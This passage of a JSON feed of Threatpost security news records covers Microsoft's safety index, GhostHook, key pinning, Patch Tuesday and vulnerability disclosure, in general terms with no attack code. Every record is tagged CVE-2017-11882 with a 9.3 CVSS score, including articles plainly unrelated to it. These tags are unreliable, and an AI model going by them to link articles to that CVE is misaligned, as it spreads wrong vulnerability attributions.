anti-virus software and running regular updates falls under the Foundational tier. 
The more steps you take, the higher your MCSI score, with 100 being the highest score possible.\n\nMicrosoft polled consumers in U.S., U.K., Germany, France and Brazil in what the company called a \u2018benchmark survey.\u2019 The average MCSI from that poll, 34, suggests users have the basics covered but have left lots of room to improve, Microsoft said.\n\nAmong the five countries, 55 percent of users use automatic computer updates and roughly 90 percent of those surveyed use anti-virus protection. Conversely, only 26 percent of users said they had confidence in their PC security software while only eleven percent agreed \u201cgood digital citizens\u201d are winning the war against hackers.\n\nThe metric was developed in conjunction with the upcoming 10-year anniversary of the [Trustworthy Computing Group](<https://threatpost.com/katie-moussouris-microsoft-trustworthy-computing-and-evolution-security-community-031611/>) next year and was released as October, [National Cyber Security Awareness Month](<https://threatpost.com/president-obama-national-cybersecurity-awareness-month-101909/>), winds down.\n", "cvss3": {}, "published": "2011-10-27T21:22:26", "type": "threatpost", "title": "Microsoft Invents New Way To Measure Online Safety (And Finds That Consumers Stink At It)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:33:29", "id": "THREATPOST:11053DD231ACA5F34708B38E7E96AE9F", "href": "https://threatpost.com/microsoft-invents-new-way-measure-online-safety-and-finds-consumers-stink-it-102711/75813/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:03:19", "description": "Estimates of the extent of cyber crime are hopelessly overblown, two computer security researchers argue in an [editorial from Sunday\u2019s New York Times](<http://www.nytimes.com/2012/04/15/opinion/sunday/the-cybercrime-wave-that-wasnt.html>).\n\nArguing counter to 
the prevailing opinion that online crime is a modern-day Yukon Gold Rush for entrepreneurial hackers, the two Microsoft researchers say that evidence suggests that only a sliver of the world\u2019s cyber crooks get rich from their illegal activity, while most struggle to make it. \n\n\u201cIf getting rich were as simple as downloading and running software, wouldn\u2019t more people do it?\u201d researchers Dinei Flor\u00eancio and Cormac Herley ask in their Times editorial, \u201cThe Cybercrime Wave That Wasn\u2019t.\u201d\n\nThe editorial synthesizes the findings of a raft of research from Herley and his colleagues that cast doubt on the estimates of the size of the cyber underground \u2013 many of which were funded by private security firms with an interest in making cyber crime appear to be a large and pressing problem.\n\nThe two studied surveys of cyber crime affecting consumers and companies. They conclude that estimates of the amount of cyber crime make a number of common errors in trying to extrapolate the extent of global cyber criminal activity. Surveys, for example, mistakenly ratchet up the numbers when they try to scale small survey groups to the overall population. The two also single out the adverse effect \u2018unverified outliers\u2019 can have on data. In their research, 90 percent of estimates are skewed by input from one or two individuals. 
\u201cUpward bias\u201d \u2013 a tendency to overstate a general phenomenon based on statistical evidence \u2013 permeated all of the surveys the two looked over, according to the piece.\n\nThe editorial draws from a paper issued by Herley and Flor\u00eancio, \u201cSex, Lies and Cyber-crime Surveys,\u201d in which the two researchers [reasoned that cyber crime surveys](<https://threatpost.com/microsoft-research-cybercrime-surveys-are-useless-062111/>) are \u201cso compromised and biased that no faith whatever can be placed in their findings.\u201d When the research was published, the duo called their assessment harsh but insisted that when it comes to security research, unreliable data is just masquerading as reliable data.\n\nThe thoughts also echo some that Herley, a principal researcher at Microsoft, has expressed before. In 2009, Herley challenged the concept that the underground cyber crime community\u2019s size and vitality are forces to be reckoned with.\n\nIn a June 2009 [podcast with Threatpost editor Dennis Fisher](<https://threatpost.com/cormac-herley-underground-economy-irc-economics-and-externalities-cybercrime-061209/>) that is still applicable today, Herley rationalized that it\u2019s hard to get an accurate reading on some security metrics and that the value of the underground economy was being oversold.\n\nIn a recent publication for IEEE Security And Privacy Magazine, Herley [took a similar, contrarian stance against popular coverage of banking fraud](<https://threatpost.com/money-mules-not-customers-real-victims-bank-fraud-032712/>), noting that money mules, not the account holders, were the most victimized by online bank heists. 
\n", "cvss3": {}, "published": "2012-04-17T18:33:53", "type": "threatpost", "title": "Errors, Outliers Obscure Cybercrime Losses", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:32:26", "id": "THREATPOST:17AC167B3F04D3043199819655CB5EB8", "href": "https://threatpost.com/errors-outliers-obscure-cybercrime-losses-041712/76449/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:29", "description": "A bypass of PatchGuard kernel protection in Windows 10 has been developed that brings rootkits for the latest version of the OS within reach of attackers.\n\nSince the introduction of PatchGuard and DeviceGuard, very few 64-bit Windows rootkits have been observed; Windows 10\u2019s security, in particular its mitigations against memory-based attacks, are well regarded. Researchers at CyberArk, however, found a way around PatchGuard through a relatively new feature in Intel processors called Processor Trace (Intel PT).\n\nThe bypass, which has been nicknamed [GhostHook](<https://www.cyberark.com/threat-research-blog/ghosthook-bypassing-patchguard-processor-trace-based-hooking/>), is a post-exploitation attack and requires an attacker already be present on a compromised machine and running code in the kernel. As a result, Microsoft said it will not patch the issue, but may address it in a future version of Windows, CyberArk said. ~~A request for comment from Microsoft was not returned in time for publication.~~\n\n\u201cThis technique requires that an attacker has already fully compromised the targeted system. 
We encourage our customers to practice good computing habits online, including exercising caution when clicking on links to web pages, opening unknown files, or accepting file transfers,\u201d a Microsoft representative said in a statement provided to Threatpost.\n\nCyberArk concedes this may be a difficult fix for Microsoft, and said the quickest path to a fix may come from security vendors whose products hook in to PatchGuard. Intel PT, which was released months after PatchGuard, enables security vendors to monitor stacks of commands that are executed in the CPU in order to identify attacks before they reach the operating system.\n\n\u201cWe are able to execute code in the kernel and go unnoticed by any security feature Microsoft produces,\u201d said Kobi Ben Naim, senior director of cyber research. \u201cMany other security vendors rely on PatchGuard and on DeviceGuard in order to receive reliable information and analyze whether it\u2019s benign or an attack. This bypass enables us to go unnoticed versus the security vendors we checked (this includes antimalware, firewalls, host-based intrusion detection and more) that rely on those security layers to provide reliable information.\u201d\n\nNaim said that such an attack is within the realm of a nation-state attacker and that some well known targeted intrusions such as Flame and Shamoon make use of 64-bit malware to establish a foothold on machines and networks. Naim warned as well that if exploit code were to become public and criminal operations were able to execute ransomware through this technique, the results could be \u201ccatastrophic.\u201d\n\nNaim said Microsoft is making a mistake in not addressing this issue sooner.\n\n\u201cWe got an answer from Microsoft saying that because you are already an administrator on the machine, it\u2019s already compromised. But in this case, it\u2019s the wrong answer,\u201d Naim said. 
\u201cAll of those new security layers weren\u2019t designed to combat administrators or code that runs with administrator rights. This is a problematic answer [from Microsoft].\u201d\n\nCyberArk contends that the weakness is in Microsoft\u2019s implementation of Intel PT, specifically at the point where Intel PT talks to the OS.\n\n\u201cThe Intel feature is an API that the kernel code can ask to receive and read information from the CPU. The way that Microsoft implemented this API is the issue we found,\u201d Naim said. \u201cThis enabled us to not only read information but enter our code into a secure location in the kernel.\u201d\n\nAn attacker interacting at that layer can run code of their choosing and do so quietly without being detected by any number of security technology, CyberArk said.\n\n\u201cIt\u2019s very important to say that PatchGuard itself is a very strong mechanism, and the fact is we haven\u2019t seen any rootkits since it was introduced in Windows 10,\u201d Naim said.\n\nCyberArk said it will make enough of its attack public to demonstrate that it\u2019s feasible and enable security vendors to ready patches from their end.\n\nKaspersky Lab released a statement:\n\n> \u201cKaspersky Lab is aware of the hooking technique described by CyberArk researchers, that allows using Intel processor\u2019s feature to circumvent Windows\u2019 security. As conducting such an attack would require that a hacker is already running code in the kernel, this hooking technique doesn\u2019t significantly extend an attack surface.\u201d\n\nNaim said CyberArk has not seen this type of attack in the wild, but believes nation-states are using it.\n\n\u201cWe think attackers are already using it in country- or military-grade malware,\u201d Naim said, adding that by examining research on Flame and Shamoon, nation-states are close to executing against this type of vulnerability.\n\n\u201cWe think it\u2019s pretty critical,\u201d Naim said. 
\u201cThe real impact is if an attacker uses it, they can go uncovered for many months before someone will notice something is wrong. If we can take this capability and add it to ransomware, it would be pretty catastrophic. No player will be able to stop them once they are executing code behind PatchGuard. Today ransomware works in user mode because of PatchGuard. If they were able to execute this code behind PatchGuard, it will be a catastrophic effect.\u201d\n\n_This article was updated June 22 with a comment from Microsoft and Kaspersky Lab._\n", "cvss3": {}, "published": "2017-06-22T11:25:39", "type": "threatpost", "title": "GhostHook Attack Bypasses Windows 10 PatchGuard", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2017-06-22T19:10:38", "id": "THREATPOST:BDE4A24DFC0713FBC25AB0F17931717C", "href": "https://threatpost.com/ghosthook-attack-bypasses-windows-10-patchguard/126462/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:51", "description": "Microsoft is considering adding public-key pinning\u2013an important defense against man-in-the-middle attacks\u2013to Internet Explorer.\n\nThe feature is designed to help protect users against the types of MITM attacks that rely on forged certificates, which comprise a large portion of those attacks. Attackers use forged or stolen certificates to trick victims\u2019 browsers into trusting a malicious site that the attacker controls. Public-key pinning helps prevent those attacks by binding a set of public keys issued by a trusted certificate authority to a specific domain. With that defense in place, if the user visits the site and is presented with a key that\u2019s not part of the pinned set, the browser will reject the secure connection.\n\nPublic-key pinning as an extension to HTTP is laid out in an Internet-Draft submitted to the IETF by a group of Google security engineers in October. 
The [draft](<http://tools.ietf.org/html/draft-ietf-websec-key-pinning-21>) makes it clear that in order for the system to work, site operators must be up to the task.\n\n\u201cDeploying PKP safely will require operational and organizational maturity due to the risk that hosts may make themselves unavailable by pinning to a (set of) SPKI(s) that becomes invalid. With care, host operators can greatly reduce the risk of man-in-the-middle (MITM) attacks and other false-authentication problems for their users without incurring undue risk,\u201d the specification says.\n\nBut in order for the system to work, browsers must support it, as well. Google Chrome already ships with public-key pinning support, and Mozilla Firefox 32, which debuted in September, also includes the feature. Now, Microsoft has public-key pinning [under consideration](<https://status.modern.ie/publickeypinningextensionforhttp>) for inclusion in Internet Explorer, too.\n\nMITM attacks come in a variety of flavors, but one of the key components in many of them is the use of a forged certificate. In order to fool a user\u2019s browser into trusting a site that the attacker controls, the attacker can present a stolen or forged certificate for the site. This happens fairly regularly, and the technique has come up in some high-profile attacks in the last few years. In 2011, an attacker [compromised Dutch CA DigiNotar](<https://threatpost.com/what-you-need-know-about-diginotar-hack-090211>) and issued himself valid certificates for a number of high-value domains, including those belonging to Google, Yahoo and Mozilla.\n\nEarlier that same year, an attacker\u2013who may have been the same one to compromise DigiNotar\u2013[penetrated Comodo](<https://threatpost.com/phony-ssl-certificates-issued-google-yahoo-skype-others-032311>), another CA, and pulled the same stunt, issuing certificates for Mozilla, Skype and Yahoo domains. 
The public-key pinning mechanism has the potential to defeat the attacks that result from these kinds of CA compromises by locking in a known-good set of keys for a given domain.\n", "cvss3": {}, "published": "2014-11-14T07:42:48", "type": "threatpost", "title": "Microsoft Considering Public-Key Pinning for Internet Explorer", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2014-11-18T12:09:37", "id": "THREATPOST:195656DFCDBB1B18C4B0E899AA2C96DE", "href": "https://threatpost.com/microsoft-considering-public-key-pinning-for-internet-explorer/109365/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:02:39", "description": "Microsoft issued nine bulletins fixing 16 vulnerabilities in the July 2012 edition of Patch Tuesday. Three of the bulletins received Microsoft\u2019s most severe \u2018critical\u2019 rating, while the remaining six were deemed merely \u2018important.\u2019\n\nFirst and foremost among the critical patches is [MS12-043](<http://go.microsoft.com/fwlink/?LinkID=254824>), a fix for the publicly disclosed and widely publicized XML core services vulnerability that was [actively exploited last month](<https://threatpost.com/microsoft-warns-xml-vulnerability-being-actively-exploited-061312/>). Affecting Microsoft Windows, Office, Developer Tools and Server Software, it allowed attackers to execute code remotely after tricking victims into visiting a malicious website in Internet Explorer.\n\n[MS12-044](<http://go.microsoft.com/fwlink/?LinkId=254377>), also critical, is a cumulative security update for Internet Explorer resolving two privately reported bugs that, if unpatched, could allow an attacker to remotely execute code if a user visits a specially crafted webpage using Internet Explorer. 
Successful exploitation could grant the attacker user rights, which, as always, will be more troublesome for users who operate with administrative rights.\n\nThe final critical bulletin, [MS12-045](<http://go.microsoft.com/fwlink/?LinkId=254441>), resolves one privately disclosed vulnerability in the data access components of Windows. Like the previous bulletin, this could potentially lead to remote code execution if the user visits a specially crafted website and allow the attacker to gain the same user rights as the current user.\n\nThe remaining \u2018important\u2019 bulletins resolve 12 vulnerabilities altogether: one bug in Visual Basic for Applications and another in the Windows Shell that could allow for remote code execution. The fix also covers two elevation of privilege vulnerabilities in Windows Kernel-Mode Drivers, six in SharePoint, and one more in Office for Mac, in addition to an information disclosure bug in TLS.\n\nYou can find the entire TechNet announcement [here](<http://technet.microsoft.com/en-us/security/bulletin/ms12-jul>).\n", "cvss3": {}, "published": "2012-07-10T19:23:26", "type": "threatpost", "title": "Three Critical Fixes in July Microsoft Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T20:03:28", "id": "THREATPOST:C56525805A371C56B68CE54AB4EDB9AF", "href": "https://threatpost.com/three-critical-fixes-july-microsoft-patch-tuesday-071012/76785/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:57:23", "description": "Today is Patch Tuesday, the 11-year-old procession of security bulletins from Microsoft streamed out automatically to consumers of Windows Update, and pulled en masse by enterprise admins worldwide needing to test each for compatibility.\n\nThis is how it\u2019s been done since shortly after Bill Gates\u2019 Trustworthy Computing memo in 2002 set Microsoft on its 
course of secure software development. But in 2015, as the concept approaches adolescence, are we asking the right questions about the viability of a scheduled patch delivery?\n\nSure, enterprises may be ingrained in this rote consumption of security fixes on the second Tuesday of every month, but given that Microsoft is in the middle of a personality overhaul under new CEO Satya Nadella with a vigorous focus on the cloud, and the company\u2019s [vaunted Trustworthy Computing group disbanded as a single entity](<http://threatpost.com/era-ends-with-break-up-of-trustworthy-computing-group-at-microsoft/108404>) and migrated into several business units inside Microsoft, Patch Tuesday may be showing some signs of cracking.\n\nOutside forces aren\u2019t helping much. Zero days dominate the headlines, but affect relatively few until attacks find their way into exploit kits, turning specialized hacks into commodity danger. Google\u2019s Project Zero is the most recent conspirator undermining the value of regular patching cycles; the research team has put vendors on notice that a [90-day countdown](<http://threatpost.com/round-2-google-deadline-closes-on-pair-of-microsoft-vulnerabilities/110474>) starts the second a vulnerability is reported to Microsoft\u2014or any vendor for that matter. And once the 90 days are up, disclosure is full and angst is high.\n\n**Patch Quality in Crosshairs**\n\nInternally, since TWC in September was integrated into Microsoft\u2019s cloud and enterprise group\u2014coinciding with more than 2,100 layoffs, including several key security people\u2014eyebrows have also been raised about patch quality and timeliness. Most notably, a critical vulnerability in Microsoft\u2019s Schannel, the SSL/TLS implementation in Windows, was patched in November, but within days the patch was pulled back because of [issues with TLS negotiations](<http://threatpost.com/issues-arise-with-ms14-066-schannel-patch/109385>). 
It was re-issued in short order, but coincidentally or not, the situation did not endear anyone to the reorg going on in Redmond.\n\nEven going into today\u2019s Patch Tuesday release, a critical [cross-site scripting vulnerability in Internet Explorer affecting Windows 7 and 8.1](<http://threatpost.com/xss-vulnerability-in-ie-could-lead-to-phishing-attacks/110854>) users, which was made public last week along with proof-of-concept code, is still unpatched, and Microsoft has been silent on when a fix is coming. That silence could, in part, be due to the fact that the company recently [discontinued providing users with advanced notification of patches](<http://threatpost.com/microsoft-limits-advanced-patch-notifications-to-premier-customers/110294>), making them available only to premier support customers. Perhaps security will stop being a marketing differentiator for Microsoft.\n\n\u201cThey\u2019re not going to get rid of security, but like Apple, put it more behind the scenes,\u201d said Marc Maiffret, a longtime Windows bug-hunter and current CTO at BeyondTrust. \u201cIt\u2019s not going to be the thing they talk about most. It distracts from them being a software and technology company.\u201d\n\nMicrosoft\u2019s QA testing of patches is extensive and reportedly separate from the Microsoft Security Resource Center (MSRC) and TWC, which focuses on security research, threat modeling and risk management. Updates are tested against a variety of application and operating system environments for compatibility issues and must meet strict deadlines to be included in Windows Update on schedule. Patches are also tested against third-party applications, and Microsoft will insist that patch quality issues have little to do with TWC changes and more to do with advanced and changing threats.\n\n\u201cMicrosoft carefully reviews and tests each security update to ensure its quality and that it has been thoroughly evaluated for application compatibility. 
There are many factors that can impact the length of testing,\u201d said Chris Betz of the MSRC in a statement provided to Threatpost. \u201cOnce the update is built, it must be tested with the different operating systems and applications it affects, then localized for the different markets and languages around the world. In some instances, multiple vendors are affected by the same or similar issues, which requires a coordinated release.\u201d\n\nMicrosoft\u2019s focus on delivering a consistent schedule of patches helps users inside the enterprise and smaller organizations line up their deck chairs, do compatibility testing and control patch rollouts. These processes are finely tuned compared to a decade ago, and most organizations would not trade Patch Tuesday for automatic silent patching a la Google\u2019s updates to Chrome, experts said.\n\n\u201cThe bigger factor that surrounds things like Patch Tuesday is that threats have changed,\u201d Maiffret said. \u201cOrganizations like governments or anyone who is a high-value target, has a good chance of getting hit with a zero day, which Patch Tuesday has no bearing on, at least up front. That\u2019s a big part of it: security moving away from the value of one individual vulnerability.\u201d\n\n**Automatic Patching Has Its Place**\n\nMicrosoft, for its part, has not been stagnant with patching. New services such as [myBulletins](<http://threatpost.com/microsoft-mybulletins-service-customizes-patch-details/106339>) and a revamped Exploitability Index help customers make deployment decisions, while its partner programs such as Microsoft Active Protections Program give participating enterprises and vendors a heads-up on vulnerability details in order to coordinate patch delivery with interdependent products.\n\n\u201cEach customer is unique with varying needs based on their technology environments. 
With the evolution of cloud computing, more and more customers are taking advantage of the real time updates we provide,\u201d said Betz. \u201cCustomers are also increasingly taking advantage of Microsoft Update to automatically provide updates.\u201d\n\nAttackers have the luxury of being able to focus on one bug, but defenders have to look at the biggest risks to their respective environments, hoping they make the right assessments and prioritizations. And this goes well beyond Microsoft to third-party applications such as Flash, Java and others that run everywhere and have been providing attackers with much more tempting targets of late. Yet with the world primarily still running on Windows, especially in smaller organizations, patch quality still gives people pause with regard to going to an automated process.\n\n\u201cI think people would like to be in automatic mode. There\u2019s a huge value to set-it-and-forget-it, but there\u2019s still a risk involved and it\u2019s difficult for people to consume that risk not knowing what could happen,\u201d said Andrew Storms, vice president of security services at New Context, and former security executive at CloudPassage and nCircle. \u201cLarge enterprises are always slower moving to the adoption of new concepts and risk, especially with IT. The argument for the other side is what if I could cut a third of my patching costs if I don\u2019t have to patch all the time; if I were a CIO, I would be drooling.\u201d\n\nThat, of course, depends on patches that are good to go out of the box, so to speak.\n\n\u201cAny business at the scale of Google or Microsoft has so many complexities that there are going to be unforeseen interactions,\u201d said Tripwire security researcher Craig Young. \u201cThat\u2019s why enterprises test patches in a controlled environment to make sure they don\u2019t breach critical business applications before rolling them out to systems. That works. 
The Chrome model is probably not appropriate if you\u2019re a hospital where all your terminals need a web app interface with insurance providers and if Microsoft updates IE and the web app no longer renders properly, how would you address that situation?\u201d\n\n**Environment to Dictate Patching Styles**\n\nKatie Moussouris, a former lead security strategist at Microsoft and current chief policy officer at HackerOne, was deeply involved in the development of Microsoft\u2019s coordinated disclosure program and in developing strong relationships with vulnerability researchers and brokers. She says vendors need to sharpen patch development where quality and speed go hand in hand. This takes on more relevance with the so-called Internet of Things, where embedded computers often don\u2019t have simple patching mechanisms yet play critical roles in manufacturing, health care and personal environments.\n\n\u201cPatching style is something that definitely has to evolve as what makes up the bulk of internet traffic starts changing,\u201d Moussouris said. \u201cMobile devices are difficult to patch, and are not patched on anyone\u2019s schedule. Many are not designed to be patched either; they\u2019re designed to be upgraded or thrown away in two years.\u201d\n\nMicrosoft, meanwhile, has taken steps to [make exploitation more difficult for attackers](<http://threatpost.com/ie-memory-attacks-net-zdi-125000-microsoft-bounty/110876>). The introduction of memory corruption mitigations such as ASLR and DEP into Windows and Internet Explorer has made buffer overflow vulnerabilities less of a hassle than a decade ago. 
Free tools such as the [Enhanced Mitigation Experience Toolkit (EMET)](<http://threatpost.com/microsoft-emet-bypasses-realm-of-white-hats-for-now/104619>) are often a stopgap for zero-day vulnerabilities until Microsoft can release a scheduled or out-of-band security bulletin.\n\n\u201cMicrosoft has focused on a higher level of mitigations, knowing how high to raise the bar to make exploitation really hard,\u201d Maiffret said. \u201cI hope they keep their eye on mitigations, not just EMET but also the underlying operating system.\u201d\n\nFor the time being, Microsoft won\u2019t retire Patch Tuesday and its high-paying enterprise customers likely won\u2019t let them. And in the end, Patch Tuesday is still relevant on many fronts, and the processes are still superior to many third-party patching processes.\n\n\u201cStepping back, you have to ask: \u2018What\u2019s the relevance of Microsoft vulnerabilities in attacks and exploits?'\u201d Maiffret said. \u201cMicrosoft software is still relevant and part of targeted attacks; you still see IE targeted attacks happening, but at the same time, you\u2019re seeing an increase of third-party apps in targeted attacks. That\u2019s the biggest shift. Microsoft is slightly putting security in the back seat, not doing less internally, but in visibility. 
That mirrors what\u2019s happening from the attackers\u2019 perspective; it\u2019s just as important to find a Flash or Java vulnerability versus a Microsoft vulnerability.\u201d\n", "cvss3": {}, "published": "2015-02-10T09:00:49", "type": "threatpost", "title": "Creaking Patch Tuesday's Viability Rests with Quality, Speed", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2015-02-11T12:02:27", "id": "THREATPOST:0DD2574E8237EB5925DD5C2AC8B9A426", "href": "https://threatpost.com/creaking-patch-tuesdays-viability-rests-with-quality-speed/110941/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:01:46", "description": "Microsoft announced today that it plans on shipping seven bulletins, five critical, two important, for the [December edition](<http://technet.microsoft.com/en-us/security/bulletin/ms12-dec>) of its monthly Patch Tuesday security bulletin release cycle.\n\nThe year\u2019s last scheduled batch of patches will address 11 vulnerabilities in all currently supported operating systems, including Microsoft Windows, Internet Explorer (IE 6-10), Office and the company\u2019s Server Software.\n\nIf left unpatched, six of the seven bulletins could lead to remote code execution while the last could allow a hacker to bypass one of Windows\u2019 security features.\n\nQualys\u2019 Wolfgang Kandek notes on the company\u2019s [Laws of Vulnerabilities blog](<http://laws.qualys.com/2012/12/december-2012-patch-tuesday-pr.html>) that the third bulletin, rated critical, affects Microsoft Word, suggesting the vulnerability may leverage Outlook to display documents without the users\u2019 interaction.\n\nThe bulletin summaries will be released in their entirety next Tuesday, December 11, and per usual, the company is set to host a [TechNet webcast](<https://msevents.microsoft.com/CUI/EventDetail.aspx?EventID=1032522564&Culture=en-US>) discussing the vulnerabilities 
and patch management practices the following day, December 12 at 11 a.m.\n", "cvss3": {}, "published": "2012-12-06T19:07:50", "type": "threatpost", "title": "Microsoft Fixing 11 Vulnerabilities for December Patch Tuesday", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-11882"], "modified": "2013-04-17T16:31:07", "id": "THREATPOST:D9C08A737D3D95BFF6B07A04C9479C6D", "href": "https://threatpost.com/microsoft-fixing-11-vulnerabilities-december-patch-tuesday-120612/77289/", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T23:10:26", "description": "[](<https://threatpost.com/partial-disclosure-was-it-cat-i-saw-032309/>)\n\nQuite often in our industry, two (or five) people can look at the same problem from different angles, and see radically different things. Rare is the situation that reads the same to everyone, forwards and backwards. It\u2019s all about perspective.\n\nIn my appearance on the \u2018[Partial Disclosure Dilemma\u2019 Panel](<http://blogs.msdn.com/katie_moussouris/archive/2009/03/09/the-partial-disclosure-dilemma-panel-at-sourceboston.aspx>) at [SOURCEBoston](<http://www.sourceconference.com/index.php/source-boston-2009>) this year, I found myself surrounded by great minds who most certainly do not think alike. 
While there was some agreement and common ground between all parties on the dais, namely wanting to make the Internet safer and protecting people, there was little agreement on the best way to accomplish that goal.\n\nThe conversation between us friends and colleagues, both on stage and in the audience, wended its way down many tangential paths, most of which I will have to watch again on the video to fully understand how we got from Partial Disclosure to Dan Kaminsky saying \u201cMore people have died from windows crashing on them than from Windows crashing.\u201d But I promised my redux of the panel, so I will guide you down the path I think was most interesting.\n\n**[ **[**Partial disclosure, complete disagreement**](<https://threatpost.com/partial-disclosure-was-it-cat-i-saw-032309/>)** ]**\n\nThe disclosure issues around [Dan Kaminsky\u2019s DNS vulnerability](<http://www.ioactive.com/docs/CERTAdvisory.doc>) were one seed of the panel idea. If you are reading this blog, then I will assume that you\u2019ve heard of this vulnerability, else you must have been living under an Amish rock in a Luddite colony, high in the brisk, thin air of the Himalayas.\n\nAs far as the disclosure route he chose and how that played out, he executed a plan he thought was best in order to get vendors to fix a serious issue (they did), *and* to get as many affected customers protected (some were) with the fix in place before broadly releasing the technical details. He let a small number of people know the details, in the hopes that delivering those details to the right people and no one else would best protect the world\u2019s critical infrastructure. Hence, the term \u2018partial disclosure\u2019 was used to describe his approach. 
Other notable researchers [thought it was just hype](<http://twitter.com/tqbf/statuses/853104857>), [then took it back once they had spoken to Dan](<http://www.matasano.com/log/1089/dan-kaminsky-could-have-made-hundreds-of-thousands-of-dollars-with-this-dns-flaw/>), [some pretty much figured it out on their own](<http://addxorrol.blogspot.com/2008/07/on-dans-request-for-no-speculation.html>), or [chatted about it on DailyDave](<http://lists.immunitysec.com/pipermail/dailydave/2008-July/thread.html>). It was [weaponized](<http://blog.metasploit.com/2008/07/bailiwicked.html>) shortly thereafter, and a couple weeks after his initial announcement, some affected people had applied the update and some unfortunately hadn\u2019t. There were certainly more details I\u2019m skipping here, but that\u2019s the skinny.\n\nNow that the panel stage was set, here\u2019s one of the topics I thought was interesting.\n\nIn our introductions, we each counted ourselves among the security research community. Some of us had also been or still are consultants, all of us had done the startup thing, and some of us had been in charge of running some kind of computing infrastructure. \nAt the risk of sounding immodest, I believe I had a unique perspective on the topic of responsible disclosure as I was the only panel member who has been, at various stages in my career, a vulnerability Finder, Coordinator, and a Vendor (for both open and closed source software).\n\nLet my official punditry from this pugnacious pulpit begin. \ud83d\ude09\n\nIt was interesting to me that the panelist who most strongly endorsed \u201cinflicting pain\u201d in the form of exploit release in order to provide the necessary \u201cwake up call\u201d to vendors had never been responsible for maintaining any kind of infrastructure deployment. 
We all know how much easier it is to break something than it is to build it or to fix it, yet there is a pervasive attitude among many security researchers that nothing should be more important than security, not even the business itself.\n\nAnd that\u2019s where our disagreement\u2019s footing took a stronger hold on its rocky purchase. Define pain, our moderator asked. Who decides on the form the pain will take and how intense or widespread it is, I asked.\n\nSure, it took some [pain](<http://news.cnet.com/At-software-giant,-pain-gives-rise-to-progress/2009-7349_3-6220566.html>) to get the [attention](<http://blogs.msdn.com/sdl/archive/2009/02/18/early-days-of-the-sdl-part-one.aspx>) of software vendors to fix their products and [build security in from the ground up](<http://blogs.msdn.com/sdl>). But as security folks, aren\u2019t we tired of having to use the same arguments of active, widespread exploitation to *prove* that something needs to be done? Security people often complain that not enough has changed since the [epoch began](<http://en.wikipedia.org/wiki/Unix_epoch>), but if that\u2019s true, then why have we not looked at ways to stop beating our heads upon the supposed brick wall of vendors or deployers of technology, and instead tried something different to get the right eyes on the right issues at the right time to do the right thing? Doesn\u2019t executing the same behavior over and over again but expecting different results equal insanity? When are we willing to stop the madness?\n\nAt the end of the panel we were each asked to describe our security utopia. My Shangri-La was this: I would like to see more cross-over among those of us who say the sky is falling and those of us upon whom the sky will fall.\n\nCommunication between two groups with different mindsets requires a [lingua franca](<http://www.emergentchaos.com/archives/2009/02/boundary_objects_and_thre.html>) other than exploitation. 
One might think that math is the language of the universe, and Proof of Concept serves as the mathematical proof needed for anyone and everyone to arrive at the logical conclusion of \u201cdrop everything NOW and create (if you\u2019re a vendor) or apply (if you\u2019re managing infrastructure) the update.\u201d Before I had ever been responsible for building anything or protecting anything, I might have agreed with that, since it made perfect logical sense to me at the time, in the context within which I worked.\n\nBut it\u2019s not doing the trick of convincing all vendors and all deployers by a long shot, so obviously, we need something to change. PoC can and should be part of the conversation between responsible researchers and people to whom they are reporting the issues, but it must be framed appropriately for the listener. PoC is not that simple for non-security types to immediately frame the same way we do as security people. Even if they do grok the severity of the situation, they may not be *able* to move as quickly as a researcher feels they should.\n\nConsider this, researcher-types: If you\u2019ve never managed infrastructure before, or been responsible for shipping and maintaining complex and widely deployed code, then you don\u2019t have the context to understand why there are sometimes legitimate reasons to do things more carefully and therefore more slowly. Once the talk recordings are posted, check out the very thorough treatise by our own MSRC on [How Microsoft Fixes Security Vulnerabilities: Everything you wanted to know about the MSRC Security Update Engineering Process](<http://www.sourceconference.com/index.php/source-boston-2009/boston-2009-sessions>). Think about how you as a researcher and security expert would react if some CTO or IT person or developer who lacks your depth of security knowledge and subject matter expertise came and told you what to hack, how to hack, and at what pace to hack it? 
